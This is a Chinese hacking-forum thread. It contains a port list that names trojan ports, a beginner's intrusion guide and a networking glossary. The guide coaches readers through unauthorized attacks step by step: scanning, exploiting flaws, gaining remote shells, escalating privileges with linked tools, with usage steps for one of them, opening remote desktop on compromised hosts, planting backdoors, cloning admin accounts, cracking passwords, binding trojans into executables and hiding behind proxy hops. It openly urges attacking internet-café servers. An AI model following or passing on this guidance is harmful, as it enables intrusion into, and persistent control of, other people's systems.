1493=netmap_lmnetmap_lm
1494=icaica
1495=cvccvc
1496=liberty-lmliberty-lm
1497=rfx-lmrfx-lm
1498=Watcom-SQLwatcom-sql
1499=FedericoHeinzConsultora
1500=VLSILicenseManager
1501=Satellite-dataAcquisitionSystem3
1502=Shivashivadiscovery
1503=Databeamimtc-mcs
1504=EvbsoftwareEngineeringLicenseManager
1505=FunkSoftware,Inc.
1524=ingres
1525=oracle
1525=ProsperoDirectoryServicenon-priv
1526=ProsperoDataAccessProtnon-priv
1527=oracletlisrv
1529=oraclecoauthor
1600=issd
1651=proshareconfaudio
1652=proshareconfvideo
1653=proshareconfdata
1654=proshareconfrequest
1655=proshareconfnotify
1661=netview-aix-1netview-aix-1
1662=netview-aix-2netview-aix-2
1663=netview-aix-3netview-aix-3
1664=netview-aix-4netview-aix-4
1665=netview-aix-5netview-aix-5
1666=netview-aix-6netview-aix-6
1986=ciscolicensemanagement
1987=ciscoRSRBPriority1port
1988=ciscoRSRBPriority2port
1989=ciscoRSRBPriority3port
1989=MHSnetsystemmshnet
1990=ciscoSTUNPriority1port
1991=ciscoSTUNPriority2port
1992=ciscoSTUNPriority3port
1992=IPsendmsgipsendmsg
1993=ciscoSNMPTCPport
1994=ciscoserialtunnelport
1995=ciscoperfport
1996=ciscoRemoteSRBport
1997=ciscoGatewayDiscoveryProtocol
1998=ciscoX.25service(XOT)
1999=ciscoidentificationport
2009=whosockami
2010=pipe_server
2011=raid
2012=raid-ac
2013=rad-am
2015=raid-cs
2016=bootserver
2017=terminaldb
2018=rellpack
2019=about
2019=xinupageserver
2020=xinupageserver
2021=xinuexpansion1
2021=down
2022=xinuexpansion2
2023=xinuexpansion3
2023=xinuexpansion4
2024=xinuexpansion4
2025=xribs
2026=scrabble
2027=shadowserver
2028=submitserver
2039=device2
2032=blackboard
2033=glogger
2034=scoremgr
2035=imsldoc
2038=objectmanager
2040=lam
2041=interbase
2042=isis
2043=isis-bcast
2044=primsl
2045=cdfunc
2047=dls
2048=dls-monitor
2065=DataLintchReadPortNumber
2067=DataLintchWritePortNumber
2201=AdvancedTrainingSystemProgram
2500=ResourceTrackingsystemserver
2501=ResourceTrackingsystemclient
2564=HP3000NS/VTblockmodetelnet
2784=worldwideweb-development
3049=ccmail
3264=ccmail,cc:mail/lotus
3333=dec-notes
3984=MAPPERnetworknodemanager
3985=MAPPERTCP/IPserver
3986=MAPPERworkstationserver
3421=BullAppriseportmapper
3900=UnidataUDTOS
4132=NUTSDaemonnuts_dem
4133=NUTSBootpServer
4343=UNICALL
4444=KRB524
4672=remotefileaccessserver
5002=radiofreeethernet
5010=TelepathStarttelelpathstart
5011=TelepathAttack
5050=multimediaconferencecontroltool
5145=rmonitor_secure
5190=aol,America-Online
5300=HAclusterheartbeat
5301=hacl-gs#HAclustergeneralservices
5302=HAclusterconfiguration
5303=hacl-probeHAclusterprobing
5305=hacl-test
6000-6063=x11XWindowSystem
6111=sub-processHPSoftBenchSub-ProcessControl
6141/=meta-corpMetaCorporationLicenseManager
6142=aspentec-lmAspenTechnologyLicenseManager
6143=watershed-lmWatershedLicenseManager
6144=statsci1-lmStatSciLicenseManager-1
6145=statsci2-lmStatSciLicenseManager-2
6146=lonewolf-lmLoneWolfSystemsLicenseManager
6147=montage-lmMontageLicenseManager
7000=afs3-fileserverfileserveritself
7001=afs3-callbackcallbackstocachemanagers
7002=afs3-prserverusers&groupsdatabase
7003=afs3-vlservervolumelocationdatabase
7004=afs3-kaserverAFS/Kerberosauthenticationservice
7005=afs3-volservolumemanagmentserver
7006=afs3-errorserrorinterpretationservice
7007=afs3-bosbasicoverseerprocess
7008=afs3-updateserver-to-serverupdater
7009=afs3-rmtsysremotecachemanagerservice
7010=ups-onlineonlinetuninterruptablepowersupplies
7100=XFontService
7200=FODMSFLIP
7626=冰河
8010=Wingate
8181=IMail
9535=man
45576=E代时光专业代理端口


B15层 发表时间: 10-07-16 18:29

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
org菜鸟进阶(1)

常用类软件:
黑白屋: http://www.play8.net/
华军软件 http://www.newhua.com/ (根据物理位置自行选择速度快的镜像)
中国下载 http://download.com.cn/ (使用查找功能可找到大部份软件)
东丽在线 http://www.tjdl.net/softdown/ (不错的软件下载站,类似华军)
世纪下载 http://www.21sx.com/ (也是一个不错的下载站)
安全类软件:
黑白屋:http://www.play8.net/index2.htm
安全焦点 http://www.xfocus.net/tool.php
安全资讯 http://www.aurorasafe.com/list.asp
天天安全 http://www.ttian.net/download/list.php
网嗅下载 http://netsill.com/download/default.asp
灰色轨迹 http://www.sandflee.net/down/list.asp
鹰派下载 http://211.155.27.112/~technic/down/
(一些大型精典安全软件下载,不过有时候就上不去)
校园黑客联盟 http://www.schoolhacker.com
(这两天要推出软件下载专栏,即将有一套崭新的下载程序,大家尽请关注!!)
找代理在这里:
代理使用方法 http://extend.hk.hi.cn/~sunbird/freeproxy_why.html
(各种代理使用方法介绍)
代理服务器地址 http://www.salala.com/proxy_index.htm
(每日更新的,大部份是HTTP代理)
代理服务器地址 http://www.emaga.net/8341/myann
(每日更新的,大部份是SOCKS代理,既QQ代理)

注册码在这里:
第六空间 http://www.sixthroom.com/down/qt/ser.rar (注册码大全下载)
注册码搜索 http://www.netpaste.com/code/
孤月注册码 http://www.guyue.com/key/




关于被入侵




简单说明:
经常有帖子说:“我中木马啦,怎么办?”、“我被攻击了”,“我的windows有问题,是不是被入侵啦?”等等。哪么如果你怀疑系统被入侵的话,请你首先看看日志的记录或是有什么变化,然后你应该查看可疑进程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库,杀毒。前提是你要有一定的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑一窍不通,那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险,自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外,系统不正常也可能是操作失误引起的。这里不是“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。


相关工具:

Active Ports 监视自己电脑的端口,并做出相应处理。http://www.sixthroom.com/down/aq/cn_aports.rar
windows优化大师5.1 它的进程管理功能不错。更是目前最好的系统优化软件。 http://www.sixthroom.com/down/aq/wom.rar
Windows 基准安全分析器 1.0 (特别推荐,详细资料看下载说明吧) http://www.sixthroom.com/down/admin/aq/mbsasetup.msi
Fport-2.0 查看端口关联的进程 (应用于9x/me)http://www.sixthroom.com/down/admin/aq/fport.zip
mport 比fport更胜一筹的工具 http://www.sixthroom.com/down/admin/aq/mport.zip
KV3000江民杀毒王(正式版+钥匙盘) http://www.kxweb.net/down/down.asp?downid=1&id=14
金山毒霸2003正式版 http://www.kxweb.net/down/down.asp?downid=1&id=11


相关资料:

黑白屋文档中心:http://www.play8.net/cgi-bin/news/article/list.cgi
104种木马的清除方法http://asp2.6to23.com/ebug88/net/article/net004.htm
清除恶意网页的破坏 http://assistant.3721.com/safe.htm
2000系统进程总列表 http://sinbad.zhoubin.com/read.html?board=Win&num=73
木马的检测、清除及其预防 天网安全检测 http://sky.net.cn/main/view.php?cid=170
蓝盾安全检测 http://www.bluedon.com/bluedonserver.asp
校园黑客联盟 http://www.schoolhacker.com



菜鸟进阶(3)


基础知识和入侵步骤


简单说明:
电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的文章。看完这部分的文章,你也只是算站到了门口,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做个引导。所谓入侵,可以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通常所说的利用漏洞。
基础知识网址: http://tech.163.com/tm/010213/010213_14563.html http://tech.163.com/tm/010213/010213_14564.html http://tech.163.com/tm/010214/010214_14632.html http://tech.163.com/tm/010214/010214_14634.html http://tech.163.com/tm/010214/010214_14638.html

一、要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的可能有的漏洞。这样既提高效率又不易被记录日志。
几种扫描器的简单使用教程:http://www.chinesehack.org/file/show.asp?id=5614
入侵技术介绍--目标探测:http://www.sixthroom.com/ailan/f ... 2&RootID=279&ID=279

二、找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。很多要依靠自己的知识积累及对系统的掌握及熟悉程度,这里就不多说了。 下面提供几个提供漏洞资料的网站供大家参考。
天极网 http://www.myhard.com/76284138209935360/index.shtml
绿盟科技 http://www.nsfocus.net/index.php?act=sec_bug
五月安全网 http://bgbbs.www70.cn4e.com/article.asp?cat_id=2
中国信息安全 http://www.chinafirst.org.cn/ruodian/advisory.php

三、利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与操作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。以下介绍两篇SHELL编程的文章给大家。
中国软件 http://www.csdn.net/develop/article/14/14219.shtm
程序春秋 http://www.cbinews.com/developer/showconte...?articleid=2193

四、shell是有权限差别的。最高权限--管理员权限才是我们的目标。所以有时会有提升权限的问题。当然,这也是利用了漏洞。以下介绍几篇文章。
Win2K 提升权限漏洞 http://www.yesky.com/20010530/182273.shtml
Microsoft SQL Server Webtasks权限提升漏洞 http://it.rising.com.cn/newSite/ ... 10/31-153502052.htm
Linux kernel ptrace提升权限漏洞 http://levinstorm.myetang.com/main/holes/unix/005.html
NT/2000提升权限的方法小结 http://home.lufeng.net/wolf/Computer/luodong/2000tisheng.htm
IIS提升权限漏洞 http://www.ddhome.net/hole/14.htm

五、有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎么开3389”,“怎么上传”之类问题。在这介绍给大家介绍一下现在最流行的3389吧。更多的文章请www.sixthroom.com。
远程开启3389终端服务 http://www.sandflee.net/wawa/3389-1.htm
建立你的3389肉鸡 http://www.sandflee.net/wawa/sz-3389.htm

六、为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马、破administrator的密码,手段不一而足。各位慢慢学吧。
永远的后门 http://www.ttian.net/article/show.php?id=259
Win2000 下Ping 后门的简单实现 http://www.landun.org/wenzhang/images/xiao...rticle/154.html
帐号克隆 http://www.netXeyes.org/CA.exe
帐号检查 http://www.netXeyes.org/CCA.exe
暴力破解LC4 http://www.andyxu.net/banana/tools_2/lc4.rar

端口知识介绍:
相关工具:
扫描端口是扫描器的基本功能,工具太多了。提供两个给大家,更多的参看后面。
X-Port.zip下载 http://www.xfocus.net/download.php?id=327
PortReady下载 http://dotpot.533.net/dpsoft/PortReady1.6.zip
相关资料:
端口扫描简介 http://www.netscreen.com.cn/suml/zhishiyy/.../duankougj.htm0
系统服务及木马默认端口表 http://www.pttc.yn.cninfo.net/dtsy/nettech...an/41250634.htm
端口大全 http://www.sixthroom.com/ailan/f ... 2&RootID=268&ID=268
常用默认端口列表及功能中文注解 http://www.sixthroom.com/ailan/f ... 2&RootID=267&ID=267
常见端口详解及部分攻击策略 http://www.sixthroom.com/ailan/f ... 2&RootID=266&ID=266
相关资料:
如何成为一名黑客 http://263.aka.org.cn/Docs/hacker-howto_2001.html
提问的技巧 http://bbs.online.sh.cn/eliteart ... 44fb3b6efa4377e48ae
TCP/IP基础 http://www.linkwan.com/gb/routertech/netbase/tcpip.htm
网络攻防教程 http://www.netsill.com/wenzhang/list.asp?id=115
网络入侵步骤及思路 http://www.iamguo.com/bh3/hackguide2.htm
拒绝背后黑手的窥探 IPC$漏洞大揭秘 http://computer.szptt.net.cn/2002-04-27/nw...042700109.shtml
全球ip分配表 http://519519.vicp.net/lb5000//usr/3/3_11.txt
黑客入门教程 http://www.pttc.yn.cninfo.net/dtsy/nettech...an/43934529.htm
菜鸟XXX客快速入门 http://netsafe.ayinfo.ha.cn/sqxw/2002117172333.htm
几种流行的入侵工具与讲解 http://www.pttc.yn.cninfo.net/dtsy/nettech...an/44188520.htm
常见端口详解及部分攻击策略 http://www.pttc.yn.cninfo.net/dtsy/nettech...quan/-90637.htm
攻击的各种级别 http://www.pttc.yn.cninfo.net/dtsy/nettech...an/39825935.htm


菜鸟进阶(4)

关于命令的使用

简单说明:
windowsNT/2000下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单--》帮助中可以搜索到“windows 2000 命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件,就会有新的命令(iisreset),在命令行方式下加/?或-h参数可以查看帮助,其他内置的命令当然也可以。还有就是掌握一些常用的DOS命令也是非常有必要的。因为WINSOWS不管发展到哪一天,它也都不可能取代DOS,至少现在还不行。NET命令更是最常用的网络命令,想做一个黑客,更是你所必需掌握的。掌握一些LINUX命令也是很有必要的。希望下面的资料对大家有所帮助。

相关帖子:
DOS下常用网络相关命令解释 http://www.jiejingwang.com/list.asp?id=521
入门网络命令 http://www.jiejingwang.com/list.asp?id=520
Win2000命令全集 http://www.sixthroom.com/ailan/f ... 2&RootID=343&ID=343
Windows XP下cmd命令详解 http://www.sixthroom.com/ailan/f ... 2&RootID=366&ID=366
ftp命令: http://www.hotcy.org/chem/campous/article/ftp.htm
telnet命令简介:http://www22.brinkster.com/lastknife/netbase/telnetorder.htm (以上地址简单介绍了TELNET命令,http://www.sixthroom.com/ailan/f ... 2&RootID=277&ID=277
net命令基本用法:http://www.yy0730.com/1/1/1/wen/list.asp?id=12
tftp命令: 由于TFTP命令过于简单,请自行使用“TFTP /?”进行查询。下面在给出一个参照的
实例:http://levinstorm.myetang.com/main/tutorials/hacking/006.html
一般入侵所需要的几个常用命令: http://www.yixindz.com/badschool/hacker/hack_commands.htm
Linux 的常用网络命令 http://www.jiejingwang.com/list.asp?id=522



菜鸟进阶(5)

关于windows98


简单说明:
这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。
由于98的网络功能并不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络服务启动,众所周知漏洞是由于各种服务的功能设计并不完美,所以才产生的,也就是说没有漏洞也就很难入侵,找不到什么可利用的漏洞。这给入侵带来的困难是难以想像的.共享入侵,算是最常见的攻击方式了。

相关资料:
共享入侵 http://www.sixthroom.com/ailan/f ... 2&RootID=269&ID=269
入侵windows98系统 http://www.sixthroom.com/ailan/f ... 2&RootID=270&ID=270
win98入侵网吧详解 http://www.sixthroom.com/ailan/f ... 2&RootID=271&ID=271

其实还有些方法,比如嗅探密码、发病毒和木马到信箱、甚至用QQ“联络感情”再传个绑木马的Flash等,没什么意思,就此打住(这是前辈说的,他老人家都说打住了,哪我也打住,其实是我也不知道说什么,呵呵)。
基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基于NT技术构建”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开3389的肉鸡就算是回避了问题。如果你还在用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。(在这里我也要加一句就是如果你是用98系统的话,哪么选择榕哥的流光98版也是不错的。不过有很多功能也还是无法使用)。
鉴于98的问题技术含量不高、没有深入探讨价值,所以就谈到这里吧。(个人观点)

相关工具:
NetPass 1.0 破解98共享密码 http://lovezxd.myetang.com/indexpage/indextool/NetPass.zip
cain v2.5 综合破解工具 http://www.qq888.com/down/download.asp?Did=968
exeBinderZ 1.3 EXE捆绑机 http://www.heibai.net/download/show.php?id=3028&down=3
SUPERSCAN3.0中文版下载 http://download.pchome.net/php/d ... erscanv30.exe&svr=3
X-SCAN2.3下载 http://www.xfocus.net/download.php?id=366



菜鸟进阶(6)

关于扫描出的漏洞

简单说明:
很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。如果你希望了解的多一些,最好经常到发布漏洞比较快的网站走一走,漏洞的利用是一个不段积累的过程。时间长了相信你就体会到了。


漏洞搜索:

绿盟的引擎 http://www.nsfocus.net/index.php?act=sec_bug
蓝盾的引擎 http://www.landun.org/zhongyao/sousuo.htm
补天网的引擎 http://www.patching.net/otherweb/leak/leakindex.asp
安全焦点的引擎 http://www.xfocus.net/vuln/index.php
小凤居的引擎 http://lilitou1.myetang.com/


相关帖子:
一个CGI漏洞的发现和利用 http://www.sixthroom.com/ailan/f ... 2&RootID=285&ID=285
cgi漏洞大全 http://www.sixthroom.com/ailan/f ... 2&RootID=293&ID=293
常见CGI漏洞及应对二 http://www.sixthroom.com/ailan/f ... 2&RootID=286&ID=286
常见CGI漏洞及应对一 http://www.sixthroom.com/ailan/f ... 2&RootID=287&ID=287
Windows 2000漏洞集锦1 http://www.sixthroom.com/ailan/f ... 2&RootID=288&ID=288
Windows 2000漏洞集锦2 http://www.sixthroom.com/ailan/f ... 2&RootID=289&ID=289
Windows 2000漏洞集锦3 http://www.sixthroom.com/ailan/f ... 2&RootID=290&ID=290
Windows 2000漏洞集锦4 http://www.sixthroom.com/ailan/f ... 2&RootID=291&ID=291
Windows 2000漏洞集锦5 http://www.sixthroom.com/ailan/f ... 2&RootID=292&ID=292
ASP漏洞大全 http://www.sixthroom.com/ailan/f ... 2&RootID=294&ID=294
IIS漏洞整理一 http://www.sixthroom.com/ailan/f ... 2&RootID=295&ID=295
IIS漏洞整理二 http://www.sixthroom.com/ailan/f ... 2&RootID=296&ID=296
中国网络安全响应中心各种漏洞大全 http://www.cns911.com/holes/linux/list.php


菜鸟进阶(7)

简单说明:
黑客的最终目标就是得到root(即win中的admin)权限。一个真正的黑客会把一次入侵当做是自己的一件作品,不会轻易放弃,但是有些漏洞(典型的如Unicode漏洞、ASP木马)不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。2000及更高版本os承袭了NT的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。 还要补充一点,就是在拿到一个现成的后门软件,或是一个木马的时候,一定要先看看说明。至少你应该知道这个后门运行后的效果吧?更有些人上传了某个后门软件或是木马到目标后就认为完事了,你不执行它就是传个地雷上去又有什么用呢?


相关工具:
erunasx 利用Debug Registers漏洞提升权限 http://www.qq888.com/down/download.asp?Did=796
Windows NT/2000权限提升工具,可以将任意用户提升到SYSTEM级别的权限。漏洞出在smss.exe中的DEBUG子系统,所有普通用户都可以通过该漏洞获得对系统中任意进程或线程句柄的控制,从而可以以SYSTEM或管理员权限执行任意命令。2、使用方法:假设我们已经获得一台机器上的一个GUEST用户(或其他普通用户),现在我们要这个工具来获得系统最高权限。进行如下步骤:把ERunAsX.exe和ERunAsX.dll这两个文件复制到目标主机上可访问的目录下,例如C:下。以GUEST身份运行"ERunAsX 要执行命令",例如"ERunAsX cmd.exe",这时执行的命令是以SYSTEM 权限运行的...(请注意:具体使用以软件内英文说明为准,内附该BUG解决办法)

PipeUpAdmin 对sp1及更低有效 http://maopao.com/down/download.asp?Did=69
ISPC 利用IIS的漏洞,详见自带说明 http://www.cnsq.net/sq88/down/show.asp?id=572&down=1
PHPBB论坛权限提升 http://www.newyouth.org/softdown ... .0.exploit_code.zip
WIN帮助文件溢出(可用于XP) http://www.newyouth.org/softdown ... ack/chmoverflow.zip
NT/2K权限提升工具GetAdmin下载 http://www.csdn.net/cnshare/soft/openfile.asp?kind=1&id=9807


相关帖子:
NT/2000提升权限的方法小结 http://www.sixthroom.com/ailan/f ... 2&RootID=297&ID=297
关于WIN2000的入侵,以及安全防御等问题(文章包含一次利用U漏洞提高权限的过程) http://www.sixthroom.com/ailan/f ... 2&RootID=298&ID=298
UNICODE漏洞介绍及入侵 http://www.sixthroom.com/ailan/f ... 2&RootID=299&ID=299
怎样提升权限,做后门 http://www.sixthroom.com/ailan/f ... 2&RootID=300&ID=300
一般用户获取NT服务器Admin权限的方法 http://www.sixthroom.com/ailan/f ... 2&RootID=302&ID=302
Windows NT4的安全结构(对新手有些难,了解一下吧) http://www.sixthroom.com/ailan/f ... 3&RootID=303&ID=303


菜鸟进阶(7)

关于做代理和跳板

简单介绍:
代理服务器英文全称是Proxy Cerver,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。在一般情况下,我们使用网络浏览器直接去连接其他Internet站点取得网络信息时,须送出Request信号来得到回答,然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且,大部分代理服务器都具有缓冲的功能,就好象一个大的Cache,它有很大的存储空间,它不断将新取得数据储存到它本机的存储器上,如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。更重要的是:Proxy Server (代理服务器)是 Internet链路级网关所提供的一种重要的安全功能,它的工作主要在开放系统互联 (OSI) 模型的对话层,有了对代理的了解,相信你也认识到了什么是跳板。


相关工具:
SocksCap 2.2 SOCKS调度工具 http://www.123gz.com/dzc/download/sc32r231.exe
SkSockServer1.04 代理跳板 http://www.123gz.com/dzc/download/sksockserver.zip
Snake跳板傻瓜版 http://www.123gz.com/dzc/download/sgtb.zip
代理猎手V3.1Beta1简装版 http://www.123gz.com/dzc/download/proxyhunter.zip
FTP Serv-U 4.0 正式汉化版,最常用的ftp服务程序 http://61.159.224.188/makesoftur ... 627E207574756375737
slimftp 隐蔽的ftp服务器 http://www.whitsoftdev.com/files/slimftpd.zip
天雁WEB服务器 不用安装的小型web服务程序 http://www.cnzzz.com/download/do ... 33352254709&Url=100
多种服务程序下载 http://www.zdnet.com.cn/download/windows/b...r,00.htm?sort=5


相关帖子:
代理、肉鸡、跳板的概念 http://www.sixthroom.com/ailan/f ... 2&RootID=305&ID=305
代理服务器(Proxy)完全解析 http://www.sixthroom.com/ailan/f ... 2&RootID=307&ID=307
如何使用代理服务器 http://www.sixthroom.com/ailan/f ... 2&RootID=309&ID=309
简单制作跳板 http://www.123gz.com/dzc/sksockserver-cusky.htm
Serv-U设置教程 http://www.enanshan.com/ftp/
SocksCap32 使用详解 http://www.123gz.com/dzc/sockscap32.htm
在肉鸡上安装FTP服务器 http://www.sixthroom.com/ailan/f ... 2&RootID=306&ID=306
利用 unicode 漏洞,轻松建立自己的代理服务器 http://www.123gz.com/dzc/sksockserver-nicky-1.htm#top1
特别推荐猎手与蚂蚁收藏馆 http://www.123gz.com/ (绝对值得一看)


菜鸟进阶(8)

关于终端服务(3389)
简单说明:
windows终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形界面和不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能,因此成为一个绝好的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。有一点需要强调一下使用客户端登陆远程主机对当前工作的用户没有影响,而且一切动作本地用户都是看不到的。也就是说远程登陆和本地用户是在不相同的空间,两者互不干扰。


相关工具:
WIN2000客户端 http://zudu2000.myetang.com/soft/win2k.rar
winxp下的客户端 功能比2000下的更强大 http://zudu2000.myetang.com/soft/windowsXP.zip
终端服务程序的一个补丁 使本地和远程间能复制文本 http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe
web版终端客户端 使用浏览器调用ActiveX控件访问终端服务 http://www.enanshan.com/down/tswebsetup.exe
C3389.EXE 修改终端服务端口号的工具 http://www.sandflee.net/down/show.asp?id=228&down=1
Win2k终端服务器端所需文件包 http://www.netsill.com/download/download.asp?Did=1965
3389自动安装程序-djshao正式版5.0 http://netsill.com/download/download.asp?Did=2019
开启3389工具(如果要想让远程主机开启WIN2000的终端服务,请把3389.exe也传到远程主机上并运行。然后等待一个漫长的时间(由于是无人执守安装)。就可以看到远程主机的3389端口会被打开。) http://netsill.com/download/download.asp?Did=1991
W2K终端服务客户端安装版 http://www.sandflee.net/down/show.asp?id=39&down=1


相关帖子:
关于远程启动终端服务的帖子 http://www.sixthroom.com/ailan/f ... 2&RootID=385&ID=385
终端服务问题常见问答 http://www.sixthroom.com/ailan/f ... 2&RootID=386&ID=386
图文讲解输入法漏洞入侵 http://www.sandflee.net/txt/list.asp?id=22
3389自动安装工具教程 http://netsill.com/download/download.asp?Did=2068
3389动画教程(密码china) http://netsill.com/download/download.asp?Did=1990
修改终端客户端端口动画教程 http://netsill.com/download/download.asp?Did=2009
3389资料 http://www21.brinkster.com/srob/wawa/wawa/3389txt.htm




菜鸟进阶(9)


关于克隆帐号


简单说明:
克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAMDomainsAccountUsers下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。(前辈就是前辈把大家想到的都写出来了,我实在不知道这里在加些什么了。看来也只有这样了。大家如果还有什么不明白的就到论坛里发贴子吧。
具体的看这里:
解剖安全帐号管理器(SAM)结构 http://www.sixthroom.com/ailan/f ... 3&RootID=387&ID=387
明白原理后就可以手动或者用现成的工具克隆帐号了。


相关工具:
克隆ca.exe http://www.netxeyes.org/CA.exe
检查克隆cca.exe http://www.netxeyes.org/CCA.exe
手动克隆需要SYSTEM权限,用它 psu.exe http://www.sandflee.net/down/show.asp?id=176&down=1

相关帖子:
工具克隆:ca和cca 请访问作者主页 http://www.netxeyes.org/main.html
psu用法:psu.exe提升为system权限 http://www.sixthroom.com/ailan/f ... 2&RootID=390&ID=390
手动克隆:如何克隆管理员帐号 http://www.sixthroom.com/ailan/f ... 3&RootID=388&ID=388
如何克隆管理员帐号的补充 http://www.sixthroom.com/ailan/f ... 3&RootID=389&ID=389






B16层 发表时间: 10-07-16 18:32

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
org术语表1
? 1 0 0 B a s e - V G或者1 0 0 V G - A n y L A N—使用需求优先权传输数据包的一种速率为
1 0 0 M b p s的通信技术。
? 1 0 0 B a s e - X—1 0 0 M b p s的快速以太网标准,使用C S M A / C D访问方法进行通信,具体说
明见标准IEEE 802.3u。
A
? access server (访问服务器)—访问服务器是将同步设备和异步设备连接到网络、并为
同步通信和异步通信提供路由技术的一个单元。
? active hub (有源电缆接头)—有源电缆接头是在星形拓扑结构中连接结点的一种网络
传输设备,每当数据信号通过集线器时,可以对其进行重建、重定时和放大。
? Address Resolution Protocol (地址解析协议, ARP)—一种基于T C P / I P的协议,利用该
协议,发送结点可以确定接收结点的M A C地址。
? American National Standards Institute (美国国家标准协会, ANSI)—这是致力于为各种
产品(包括网络设备)建立标准的组织。
? American Standard Code for Information Interchange ( 美国信息交换标准码, ASCII)—
一种8位字符编码的方法,由9 6个大写字母、小写字母和数字另加3 2个非打印字符组成。
? analog (模拟)—模拟是一种可以连续变化的各种类型的传输,如正电压和负电压的电
波。
? A p p l e Ta l k—对等协议,用于网络上多台M a c i n t o s h计算机之间的通信。
? application-specific integrated circuit (专用集成电路, ASIC)—在芯片上定制的集成电
路,其中包括特殊的逻辑功能,如快速路由逻辑。
? Asynchronous Transfer Mode (异步传输模式, AT M )—采用信元、多通道和交换在同一
网络上发送音频、视频和数据传输的传输方法。
? ATM attached device (AT M附属设备)—将数据流转换为AT M信元流,或者将AT M信元
流转换成数据流的设备。
? ATM Forum (AT M论坛)—与ITU T一起,致力于AT M的L A N和WA N应用规范制定的
硬件供应商、电信服务提供商以及用户的联盟。
? ATM permanent virtual circuit (AT M永久虚拟电路, PVC)—一个专用电路,在两个指
定端点之间具有预先配置的路径一个固定分配的带宽。
? ATM switch (AT M交换器) — 一个交换器,以AT M分层通信的方式对信元传输进行操
作。
? ATM switched virtual circuit (AT M转换虚拟电路, SVC)—为分立的通信任务建立并使
用的电路,当该任务完成时,则拆卸该电路。
? attachment unit interface (连接单元接口, AUI)—是一种网络接口,用来将同轴电缆、
双绞线或光纤主干电缆连接到网络结点如集线器、交换机或工作站上。接口由连接器、
电缆、接口回路和电气特性的A U I标准组成。
? attenuation (衰减)—当信号沿通信介质从源(传输结点)发送到接收结点时,丢失的信
号量。
? Audio Video Interleave (音频视频交错, AV I )—AV I是一种声频和视频文件格式,为
Microsoft Windows 3.1或更高环境下的应用而开发。AV I对那些准备复制为短小的“片”
的视频和音频数据进行隔行扫描。






B
? backbone (主干)—一种高容量的通信介质,用于连接同一层、不同层或跨越长距离的
网络。
? backbone cabling (主干布线)—根据E I A / T I A - 5 6 8标准的定义,主干电缆为在网络设备
室、楼层和建筑物用的电缆。
? band rate (波特率)—波特率衡量数据传输速率,用来描述老式调制解调器的速度,在
一次信号振荡时发出一个数据位。
? bandwidth (带宽)—带宽指通信介质的传输能力,通常以每秒多少位(数据传输)或赫兹
(对于数据、音频和视频传输)来衡量,并由最大传输能力减去最小传输能力决定。
? baseband (基带)—基带是一种传输类型。在基带传输中,通信介质(如电缆)的整个通
道容量只被一个数据信号使用,从而在一定时间只有一个结点用于传输。
? Basic Rate Interface for ISDN (ISDN基本速率接口, BRI)—一种I S D N接口,由三个信
道组成。其中两个6 4 K b p s的信道用于传输数据、语音、视频和图形。第三个1 6 K b p s信
道用于传输信令。
? batch (批处理)—不需要用户或其他计算机系统干预的一个接一个的一系列处理过程。
